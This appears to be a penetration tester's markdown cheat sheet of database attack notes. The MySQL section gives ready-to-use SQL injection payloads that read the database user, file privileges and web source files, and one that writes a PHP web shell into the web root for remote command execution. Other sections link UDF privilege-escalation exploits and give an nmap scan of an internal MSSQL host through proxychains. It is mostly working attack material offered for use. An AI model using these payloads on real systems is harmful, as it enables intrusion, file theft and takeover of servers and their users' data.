# Databases
## MongoDB
crack password from pcap -> check PG Tico
## MySQL
* SQLi to LFI

Get current user: utos=%' union select 1,(select user()),3,4,5,6,7,8,9,10,11,12,13,14 --  
Check file privileges: utos=%' union select 1,(select group_concat('%0a',file_priv,'%0a') fRoM mysql.user where user='root'),3,4,5,6,7,8,9,10,11,12,13,14 --  
utos=%' union select 1,(select to_base64(load_file('C:\\xampp\\htdocs\\discuss\\index.php'))),3,4,5,6,7,8,9,10,11,12,13,14 --  


* SQLi to RCE
utos=%' union select 1,"<?php echo shell_exec($_GET['c']);?>",3,4,5,6,7,8,9,10,11,12,13,14  into OUTFILE 'C:\\xampp\\htdocs\\back.php' --  


* privesc UDF
https://www.exploit-db.com/exploits/7856
https://www.exploit-db.com/exploits/46249 (x86)
https://www.exploit-db.com/exploits/1518
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7856.tar.gz
## MSSQL
* Nmaprecon
`sudo proxychains -q nmap -sT -p1433,445,1434 --script 'ms-sql* and not brute' -oN recon/mssql-nmap 172.16.1.5 -vv`
## Orable
* https://0xdf.gitlab.io/2018/08/04/htb-silo.html
* methodology: https://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf

## Neo4j
